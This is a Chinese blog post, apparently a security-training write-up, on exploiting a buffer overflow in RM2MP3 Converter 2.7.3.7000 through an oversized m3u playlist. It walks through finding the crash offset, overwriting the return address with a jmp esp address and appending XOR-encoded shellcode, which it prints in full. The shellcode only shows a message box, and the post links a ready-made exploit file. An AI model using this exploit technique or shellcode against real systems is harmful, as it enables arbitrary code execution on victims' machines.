RM2MP3溢出漏洞报告【利用篇】

最新推荐文章于 2020-04-25 19:12:28 发布
最新推荐文章于 2020-04-25 19:12:28 发布
阅读量597 收藏
点赞数
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/capnik/article/details/58605159
版权
版本:2.7.3.7000
工具:X32Dbg、010Editor、记事本
环境:win7 sp1 x86

时间:2016.12.22


漏洞原理

软件在读取m3u播放列表文件时,如果m3u大小在45Kb左右的时候会发生溢出。



1.首先准备一个m3u文件

里面填入“1111……”这样的数据,如下图所示:



2.拖拽m3u文件到程序窗口

程序崩溃,异常偏移是31313131,也就是1的ASCII表现形式



3.采用二分法,分割查找具体崩溃地点



4.插入特征数据

插入有规律的一行”A0A1……B0B1……”,再次进行前面的操作,找到异常偏移32473147,也就是G1G2的ASCII表现形式



5.修改溢出点数据

将溢出点的数据改为jmp esp汇编指令的地址,这里选择一个通用的0x7FFA4512,用16进制就是1245FA7F,如下图:



6.植入Shellcode

在溢出点后面加入shellcode(弹框“Hello 15PB”),这里采用加密shellcode的方式(为了不含有0x00和0x0A特殊含义的ASCII)插入,在真正的shellcode之前,加入一段解密代码,一起组成一段shellcode,如下图:



7.漏洞利用效果

弹出对话框“Hello 15PB”:



附shellcode代码:

unsigned char hexData[324] = {
    0x12, 0x45, 0xFA, 0x7F, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x33, 0xC0, 0xE8, 0xFF, 0xFF,
    0xFF, 0xFF, 0xC3, 0x58, 0x8D, 0x70, 0x1B, 0x33, 0xC9, 0x66, 0xB9, 0x17, 0x01, 0x8A, 0x04, 0x0E,
    0x34, 0x01, 0x88, 0x04, 0x0E, 0xE2, 0xF6, 0x80, 0x34, 0x0E, 0x01, 0xFF, 0xE6, 0x82, 0xED, 0x71,
    0xEA, 0x4D, 0x49, 0x64, 0x6D, 0x6D, 0x6E, 0x21, 0x30, 0x34, 0x51, 0x43, 0x01, 0x44, 0x79, 0x68,
    0x75, 0x51, 0x73, 0x6E, 0x62, 0x64, 0x72, 0x72, 0x01, 0x4C, 0x64, 0x72, 0x72, 0x60, 0x66, 0x64,
    0x43, 0x6E, 0x79, 0x40, 0x01, 0x4D, 0x6E, 0x60, 0x65, 0x4D, 0x68, 0x63, 0x73, 0x60, 0x73, 0x78,
    0x44, 0x79, 0x40, 0x01, 0x74, 0x72, 0x64, 0x73, 0x32, 0x33, 0x2F, 0x65, 0x6D, 0x6D, 0x01, 0x46,
    0x64, 0x75, 0x51, 0x73, 0x6E, 0x62, 0x40, 0x65, 0x65, 0x73, 0x64, 0x72, 0x72, 0x01, 0xE9, 0x01,
    0x01, 0x01, 0x01, 0x5E, 0x56, 0x65, 0x8A, 0x34, 0x31, 0x01, 0x01, 0x01, 0x8A, 0x77, 0x0D, 0x8A,
    0x77, 0x1D, 0x8A, 0x37, 0x8A, 0x5F, 0x09, 0x8A, 0x72, 0x3D, 0x02, 0xF2, 0x8A, 0x77, 0x79, 0x02,
    0xF2, 0x8A, 0x57, 0x19, 0x8A, 0x47, 0x1D, 0x02, 0xC2, 0x8A, 0x7F, 0x25, 0x02, 0xFA, 0x56, 0x8A,
    0x77, 0x21, 0x02, 0xF2, 0x32, 0xC8, 0x8A, 0x3D, 0x8F, 0x02, 0xFA, 0xEA, 0x06, 0x3A, 0xCB, 0x40,
    0x74, 0xF5, 0xEA, 0x18, 0x50, 0x57, 0x8A, 0xF6, 0x8A, 0x7D, 0x25, 0x0D, 0x82, 0xEE, 0x15, 0xB8,
    0x0E, 0x01, 0x01, 0x01, 0xFD, 0xF2, 0xA7, 0x5F, 0x58, 0x75, 0x02, 0xEA, 0xE1, 0xC2, 0x5E, 0x8C,
    0x0D, 0x4E, 0x0E, 0xB6, 0x08, 0x8A, 0x05, 0x89, 0x02, 0xC2, 0x51, 0x52, 0x8A, 0x7D, 0x25, 0x09,
    0x82, 0xEE, 0x2F, 0x56, 0x52, 0xFE, 0xD1, 0x8A, 0x7D, 0x25, 0x09, 0x82, 0xEE, 0x1E, 0x6B, 0x01,
    0x6B, 0x01, 0x56, 0xFE, 0xD1, 0x8A, 0x7D, 0x25, 0x09, 0x82, 0xEE, 0x3B, 0x8A, 0x75, 0x25, 0x05,
    0x56, 0x51, 0xFE, 0xD7, 0x51, 0x8A, 0x7D, 0x25, 0x0D, 0x82, 0xEE, 0x47, 0x8A, 0x75, 0x25, 0x09,
    0x8A, 0x5D, 0x25, 0x05, 0x56, 0x52, 0xFE, 0xD7, 0x51, 0x8A, 0x7D, 0x25, 0x11, 0x8C, 0x46, 0xAE,
    0x8A, 0x5D, 0x25, 0x05, 0x6B, 0x01, 0x51, 0x51, 0x6B, 0x01, 0xFE, 0xD2, 0x8A, 0x0D, 0x25, 0x6B,
    0x01, 0xFE, 0xD0, 0x01 
};

附:

原程序下载地址:

链接:http://pan.baidu.com/s/1c2Midc0 密码:z690


m3u播放列表文件下载地址:

链接:http://pan.baidu.com/s/1sl4gAs9 密码:qdml

capnik
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RM2MP3溢出漏洞报告【分析
精彩的艺术
02-28 511
版本:2.7.3.7000 工具:OllyDbg1.1 环境:win7 sp1 x86 时间:2016.12.22 1.收集信息 •1.因为是读取文件时出现的问题,所以可能用到的API函数:CreateFileA/W •2.准备之前的利用漏洞的m3u文件 2.下断点 •下CreateFileA、Cr
Easy RM to MP3 Converter漏洞分析报告
李祥的博客
02-28 1121
Easy RM to MP3 Converter漏洞分析报告 软件名称:Easy RM to MP3 Converter 软件版本:2.7.3.700 漏洞模块:RM2MP3Converter.exe 模块版本:2.7.3.700 编译日期:2006-09-29 操作系统:Windows 7 SP1(6.1.7601) 漏洞编号: 危害等级:中 漏洞类型:缓冲区溢出 威胁类型:本
Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现
WY92139010的博客
07-02 279
Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现 一、漏洞描述 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用漏洞执行任意代码。 二、漏洞影响版本 Free MP3 CD Ripper 2.6 三...
Free CD to MP3 Converter V3.1 栈溢出漏洞分析与利用
youshangfashi的博客
04-25 304
Free CD to MP3 Converter V3.1 栈溢出漏洞分析与利用 测试环境及工具: windbg IDA winxp sp3 这算是正式调试分析的第一个漏洞,也是跟着一位学长的博客做一个复现(原博客地址在文末)。这款软件是一款音频文件转换的软件,漏洞是未检查输入文件长度而导致的缓存区溢出。因为本地缓存溢出比较简单,所以适合新手。具体分析如下: 这是原博客的exp filenam...
WIN7下Easy RM to MP3 Converter m3u文件溢出使用
dasgk的专栏
09-27 1677
笔者曾经试着同时使用PERL语言和C++,来试着进行此项活动,可是不知为什么两者相同的含义,出现的结果不同,暂且认为是对于PERL的不熟悉导致的吧,现在直接上源码 #include #include using namespace std; unsigned char strShell[]= { 0x60,0x9C,0x55,0x64,0xA1,0x30,0x00,0x00,0x00
Easy RM to MP3 Converter
08-24
对于"Easy RM to MP3 Converter 2.73700.exe"这个文件,如果存在栈溢出漏洞,应及时更新到最新版本,以消除潜在的安全风险。 总之,栈溢出是网络安全中的一个重要课题,理解和防范栈溢出是确保软件安全的关键。无论...
CCProxy远程溢出漏洞分析
03-04
《CCProxy远程溢出漏洞分析》 CCProxy是一款广受欢迎的国产代理服务器软件,支持多种网络协议,包括HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、RTSP、MMS等。由于其易于使用和友好的界面,...
windows系统漏洞挖掘
06-28
此动画来自milw0rm 非常经典的windows系统下利用IDA分析系统缓冲区溢出漏洞的动画
Exploit 编写系列教程.pdf
09-06
总结起来,《Exploit 编写系列教程》是一个深入探讨缓冲区溢出漏洞利用的教学资源,它以实例驱动,引导读者逐步理解漏洞利用的全过程,包括漏洞验证、内存分析、payload设计和安全防御机制的规避。对于想要提升安全...
19020011038-岳宇轩-lab31
08-03
实验报告涉及的知识点主要集中在Linux操作系统的基本操作,程序开发环境,以及IA-32架构下的函数调用和栈溢出攻击。以下是对这些知识点的详细解释: 1. **Linux基本操作命令**:在Linux系统中,命令行是进行日常...
命令行——rm命令(删除)详解
热门推荐
关灯吃面
04-23 3万+
转自:http://man.linuxde.net/rm rm命令 rm命令可以删除一个目录中的一个或多个文件或目录,也可以将某个目录及其下属的所有文件及其子目录均删除掉。对于链接文件,只是删除整个链接文件,而原有文件保持不变。 注意:使用rm命令要格外小心。因为一旦删除了一个文件,就无法再恢复它。所以,在删除文件之前,最好再看一下文件的内容,确定是否真要删除。rm命令可以用-i
基于Springboot和Vue的图书借还管理系统源码 图书借还管理系统代码(高分毕设)
07-28
图书借还管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
C语言内存管理:静态与动态分配的较量
07-28
C语言是一种通用的编程语言,由丹尼斯·里奇(Dennis Ritchie)在20世纪70年代早期于美国电话电报公司(AT&T)的贝尔实验室开发。C语言以其高效性、灵活性和可移植性而闻名,它是一种过程式编程语言,提供了对底层硬件的直接访问能力。 C语言的特点包括: 1. **简洁高效**:C语言的语法简洁,执行效率高,适合编写系统软件。 2. **接近硬件**:C语言提供了对内存地址和位操作的直接控制,使其非常适合硬件级编程。 3. **可移植性**:C语言编写的程序可以在不同的操作系统和硬件平台上编译和运行,具有很好的可移植性。 4. **丰富的库支持**:C语言拥有大量的标准库,如标准输入输出库(stdio.h)、数学库(math.h)等。 5. **结构化编程**:C语言支持结构化编程,允许使用循环、条件判断和函数等控制结构。 6. **指针**:C语言的指针功能强大,可以操作内存地址,实现复杂的数据结构和算法。 7. **编译型语言**:C语言是一种编译型语言,源代码需要通过编译器转换成机器码才能运行。 C语言广泛应用于操作系统(如Unix和Linux)、嵌入式系统、高性能
通讯协议规范-命令包格式
07-28
提供一份通讯协议规范,包含命令包、格式等,在上下位机调试的时候可参考该文档,制定对应的通讯协议。
四足宠物机器狗动态步行规划与仿真.pdf
最新发布
07-28
四足宠物机器狗动态步行规划与仿真
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值